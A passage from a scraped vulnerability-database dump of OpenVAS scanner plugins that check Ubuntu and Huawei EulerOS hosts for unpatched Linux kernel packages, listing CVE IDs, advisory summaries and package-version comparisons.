PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843492\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-04 08:30:51 +0200 (Wed, 04 Apr 2018)\");\n script_cve_id(\"CVE-2017-0861\", \"CVE-2017-1000407\", \"CVE-2017-15129\", \"CVE-2017-16532\",\n \"CVE-2017-16537\", \"CVE-2017-16645\", \"CVE-2017-16646\", \"CVE-2017-16647\",\n \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16994\", \"CVE-2017-17448\",\n \"CVE-2017-17450\", \"CVE-2017-17741\", \"CVE-2017-17805\", \"CVE-2017-17806\",\n \"CVE-2017-17807\", \"CVE-2017-18204\", \"CVE-2018-1000026\", \"CVE-2018-5332\",\n \"CVE-2018-5333\", \"CVE-2018-5344\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-gcp USN-3617-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-gcp'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3617-1 fixed vulnerabilities in the\n Linux kernel for Ubuntu 17.10. This update provides the corresponding updates\n for the Linux Hardware Enablement (HWE) kernel from Ubuntu 17.10 for Ubuntu\n 16.04 LTS. 
It was discovered that a race condition leading to a use-after-free\n vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A local\n attacker could use this to cause a denial of service (system crash) or possibly\n execute arbitrary code. (CVE-2017-0861) It was discovered that the KVM\n implementation in the Linux kernel allowed passthrough of the diagnostic I/O\n port 0x80. An attacker in a guest VM could use this to cause a denial of service\n (system crash) in the host OS. (CVE-2017-1000407) It was discovered that a\n use-after-free vulnerability existed in the network namespaces implementation in\n the Linux kernel. A local attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code. (CVE-2017-15129) Andrey\n Konovalov discovered that the usbtest device driver in the Linux kernel did not\n properly validate endpoint metadata. A physically proximate attacker could use\n this to cause a denial of service (system crash). (CVE-2017-16532) Andrey\n Konovalov discovered that the SoundGraph iMON USB driver in the Linux kernel did\n not properly validate device metadata. A physically proximate attacker could use\n this to cause a denial of service (system crash). (CVE-2017-16537) Andrey\n Konovalov discovered that the IMS Passenger Control Unit USB driver in the Linux\n kernel did not properly validate device descriptors. A physically proximate\n attacker could use this to cause a denial of service (system crash).\n (CVE-2017-16645) Andrey Konovalov discovered that the DiBcom DiB0700 USB DVB\n driver in the Linux kernel did not properly handle detach events. A physically\n proximate attacker could use this to cause a denial of service (system crash).\n (CVE-2017-16646) Andrey Konovalov discovered that the ASIX Ethernet USB driver\n in the Linux kernel did not properly handle suspend and resume events. A\n physically proximate attacker could use this to cause a denial of service\n (system crash). 
(CVE-2017-16647) Andrey Konovalov discovered that the CDC USB\n Ethernet driver did not properly validate device descriptors. A physically\n proximate attacker could use this to cause a denial of service (system crash).\n (CVE-2017-16649) Andrey Konovalov discovered that the QMI WWAN USB driver did\n not properly validate device descriptors. A physically proximate attacker could\n use this to cause a denial of service (system crash). (CVE-2017-16650) It was\n discovered that the HugeTLB c ... Description truncated, for more information\n please check the Reference URL\");\n script_tag(name:\"affected\", value:\"linux-gcp on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3617-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3617-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-1012-gcp\", ver:\"4.13.0-1012.16\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-1022-oem\", ver:\"4.13.0-1022.24\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-38-generic\", ver:\"4.13.0-38.43~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isdpkgvuln(pkg:\"linux-image-4.13.0-38-generic-lpae\", ver:\"4.13.0-38.43~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-38-lowlatency\", ver:\"4.13.0-38.43~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-gcp\", ver:\"4.13.0.1012.14\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-hwe-16.04\", ver:\"4.13.0.38.57\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-hwe-16.04\", ver:\"4.13.0.38.57\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-gke\", ver:\"4.13.0.1012.14\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-hwe-16.04\", ver:\"4.13.0.38.57\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-oem\", ver:\"4.13.0.1022.26\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-17450", "CVE-2018-5333", "CVE-2017-17741", "CVE-2017-0861", "CVE-2017-17805", "CVE-2017-16532", "CVE-2017-16649", "CVE-2018-5344", "CVE-2017-16537", "CVE-2017-18204", "CVE-2017-15129", "CVE-2017-16994", "CVE-2017-17448", "CVE-2017-16646", "CVE-2017-1000407", "CVE-2017-16647", "CVE-2018-5332", "CVE-2017-16650", "CVE-2017-17807", "CVE-2018-1000026", "CVE-2017-16645", "CVE-2017-17806"], "description": "The remote host is missing an update for the 
", "modified": "2019-03-13T00:00:00", "published": "2018-04-04T00:00:00", "id": "OPENVAS:1361412562310843493", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843493", "type": "openvas", "title": "Ubuntu Update for linux USN-3617-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3617_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3617-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843493\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-04 08:32:15 +0200 (Wed, 04 Apr 2018)\");\n script_cve_id(\"CVE-2017-0861\", \"CVE-2017-1000407\", \"CVE-2017-15129\", \"CVE-2017-16532\",\n \"CVE-2017-16537\", \"CVE-2017-16645\", \"CVE-2017-16646\", \"CVE-2017-16647\",\n \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16994\", \"CVE-2017-17448\",\n \"CVE-2017-17450\", \"CVE-2017-17741\", \"CVE-2017-17805\", \"CVE-2017-17806\",\n \"CVE-2017-17807\", \"CVE-2017-18204\", \"CVE-2018-1000026\", \"CVE-2018-5332\",\n \"CVE-2018-5333\", \"CVE-2018-5344\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3617-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that a race condition\n leading to a use-after-free vulnerability existed in the ALSA PCM subsystem of\n the Linux kernel. A local attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code. 
(CVE-2017-0861) It was\n discovered that the KVM implementation in the Linux kernel allowed passthrough\n of the diagnostic I/O port 0x80. An attacker in a guest VM could use this to\n cause a denial of service (system crash) in the host OS. (CVE-2017-1000407) It\n was discovered that a use-after-free vulnerability existed in the network\n namespaces implementation in the Linux kernel. A local attacker could use this\n to cause a denial of service (system crash) or possibly execute arbitrary code.\n (CVE-2017-15129) Andrey Konovalov discovered that the usbtest device driver in\n the Linux kernel did not properly validate endpoint metadata. A physically\n proximate attacker could use this to cause a denial of service (system crash).\n (CVE-2017-16532) Andrey Konovalov discovered that the SoundGraph iMON USB driver\n in the Linux kernel did not properly validate device metadata. A physically\n proximate attacker could use this to cause a denial of service (system crash).\n (CVE-2017-16537) Andrey Konovalov discovered that the IMS Passenger Control Unit\n USB driver in the Linux kernel did not properly validate device descriptors. A\n physically proximate attacker could use this to cause a denial of service\n (system crash). (CVE-2017-16645) Andrey Konovalov discovered that the DiBcom\n DiB0700 USB DVB driver in the Linux kernel did not properly handle detach\n events. A physically proximate attacker could use this to cause a denial of\n service (system crash). (CVE-2017-16646) Andrey Konovalov discovered that the\n ASIX Ethernet USB driver in the Linux kernel did not properly handle suspend and\n resume events. A physically proximate attacker could use this to cause a denial\n of service (system crash). (CVE-2017-16647) Andrey Konovalov discovered that the\n CDC USB Ethernet driver did not properly validate device descriptors. A\n physically proximate attacker could use this to cause a denial of service\n (system crash). 
(CVE-2017-16649) Andrey Konovalov discovered that the QMI WWAN\n USB driver did not properly validate device descriptors. A physically proximate\n attacker could use this to cause a denial of service (system crash).\n (CVE-2017-16650) It was discovered that the HugeTLB component of the Linux\n kernel did not properly handle holes in hugetlb ranges. A local attacker could\n use this to expose sensitive information (kernel memory). (CVE-2017-16994) It\n was discovered that the netfilter ... Description truncated, for more\n information please check the Reference URL\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 17.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3617-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3617-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU17\\.10\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU17.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-38-generic\", ver:\"4.13.0-38.43\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-38-generic-lpae\", ver:\"4.13.0-38.43\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-38-lowlatency\", ver:\"4.13.0-38.43\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", 
ver:\"4.13.0.38.41\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.13.0.38.41\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.13.0.38.41\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:39:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16525", "CVE-2017-15299", "CVE-2017-1000380", "CVE-2017-16532", "CVE-2017-16649", "CVE-2017-16535", "CVE-2017-16537", "CVE-2017-16526", "CVE-2017-16533", "CVE-2017-16536", "CVE-2017-16529", "CVE-2017-16650", "CVE-2017-16643", "CVE-2017-16531", "CVE-2017-16538", "CVE-2017-16534", "CVE-2017-16644", "CVE-2017-16530", "CVE-2017-16645"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171291", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171291", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2017-1291)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR 
PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1291\");\n script_version(\"2020-01-23T14:09:13+0000\");\n script_cve_id(\"CVE-2017-1000380\", \"CVE-2017-15299\", \"CVE-2017-16525\", \"CVE-2017-16526\", \"CVE-2017-16529\", \"CVE-2017-16530\", \"CVE-2017-16531\", \"CVE-2017-16532\", \"CVE-2017-16533\", \"CVE-2017-16534\", \"CVE-2017-16535\", \"CVE-2017-16536\", \"CVE-2017-16537\", \"CVE-2017-16538\", \"CVE-2017-16643\", \"CVE-2017-16644\", \"CVE-2017-16645\", \"CVE-2017-16649\", \"CVE-2017-16650\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 14:09:13 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:05:47 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2017-1291)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1291\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1291\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2017-1291 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package 
version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A vulnerability was found in the key management subsystem of the Linux kernel. An update on an uninstantiated key could cause a kernel panic, leading to denial of service (DoS).(CVE-2017-15299)\n\nThe usb_serial_console_disconnect function in drivers/usb/serial/console.c in the Linux kernel before 4.13.8 allows local users to cause a denial of service (use-after-free and system crash) or possibly have unspecified other impact via a crafted USB device, related to disconnection and failed setup.(CVE-2017-16525)\n\ndrivers/uwb/uwbd.c in the Linux kernel before 4.13.6 allows local users to cause a denial of service (general protection fault and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16526)\n\ndrivers/usb/core/config.c in the Linux kernel before 4.13.6 allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device, related to the USB_DT_INTERFACE_ASSOCIATION descriptor.(CVE-2017-16531)\n\nThe get_endpoints function in drivers/usb/misc/usbtest.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16532)\n\nThe usbhid_parse function in drivers/hid/usbhid/hid-core.c in the Linux kernel before 4.13.8 allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16533)\n\nThe uas driver in the Linux kernel before 4.13.6 allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device, related to drivers/usb/storage/uas-detect.h and drivers/usb/storage/uas.c.(CVE-2017-16530)\n\nThe usb_get_bos_descriptor function in 
drivers/usb/core/config.c in the Linux kernel before 4.13.10 allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16535)\n\nA flaw was found that sound/core/timer.c in the Linux kernel before 4.11.5 is vulnerable to a data race in the ALSA /dev/snd/timer driver resulting in local users being able to read information belonging to other users. Uninitialized memory contents may be disclosed when a read and an ioctl happen at the same time.(CVE-2017-1000380)\n\nThe imon_probe function in drivers/media/rc/imon.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (NULL pointer dereference and system ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~229.49.1.155\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~229.49.1.155\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~229.49.1.155\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~229.49.1.155\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", 
rpm:\"kernel-devel~3.10.0~229.49.1.155\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~229.49.1.155\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~229.49.1.155\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~229.49.1.155\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~229.49.1.155\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~229.49.1.155\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:35:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-18079", "CVE-2017-17450", "CVE-2017-17558", "CVE-2017-18203", "CVE-2017-17805", "CVE-2017-16649", "CVE-2017-16535", "CVE-2017-16537", "CVE-2017-17448", "CVE-2017-16533", "CVE-2017-16536", "CVE-2017-18208", "CVE-2017-16939", "CVE-2017-17449", "CVE-2017-16650", "CVE-2017-16643", "CVE-2017-16538", "CVE-2017-16534", "CVE-2017-17807", "CVE-2017-16644", "CVE-2017-16645", "CVE-2017-17806"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191501", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191501", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1501)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright 
(C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1501\");\n script_version(\"2020-01-23T11:57:49+0000\");\n script_cve_id(\"CVE-2017-16533\", \"CVE-2017-16534\", \"CVE-2017-16535\", \"CVE-2017-16536\", \"CVE-2017-16537\", \"CVE-2017-16538\", \"CVE-2017-16643\", \"CVE-2017-16644\", \"CVE-2017-16645\", \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16939\", \"CVE-2017-17448\", \"CVE-2017-17449\", \"CVE-2017-17450\", \"CVE-2017-17558\", \"CVE-2017-17805\", \"CVE-2017-17806\", \"CVE-2017-17807\", \"CVE-2017-18079\", \"CVE-2017-18203\", \"CVE-2017-18208\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:57:49 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:57:49 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1501)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n 
script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1501\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1501\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-1501 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The usbhid_parse function in drivers/hid/usbhid/hid-core.c in the Linux kernel, before 4.13.8, allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16533)\n\nThe cdc_parse_cdc_header() function in 'drivers/usb/core/message.c' in the Linux kernel, before 4.13.6, allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device. 
Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely.(CVE-2017-16534)\n\nThe usb_get_bos_descriptor function in drivers/usb/core/config.c in the Linux kernel can allow local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16535)\n\nThe cx231xx_usb_probe function in drivers/media/usb/cx231xx/cx231xx-cards.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16536)\n\nThe imon_probe function in drivers/media/rc/imon.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16537)\n\nThe drivers/media/usb/dvb-usb-v2/lmedm04.c in the Linux kernel, through 4.13.11, allows local users to cause a denial of service (general protection fault and system crash) or possibly have unspecified other impact via a crafted USB device, related to a missing warm-start check and incorrect attach timing (dm04_lme2510_frontend_attach versus dm04_lme2510_tuner).(CVE-2017-16538)\n\nThe parse_hid_report_descriptor function in drivers/input/tablet/gtco.c in the Linux kernel before 4.13.11 allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16643)\n\nThe hdpvr_probe function in drivers/media/usb/hdpvr/hdpvr-core.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (improper error handling and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16644)\n\nThe ims_pcu_get_cdc_union_desc function in drivers/input/misc/ims-pcu.c in the Linux kernel, through 
4.13.11, allows local users to cause a denial of service (ims_pcu_parse_cdc_data out-of-bounds read and system cra ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS Virtualization 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = 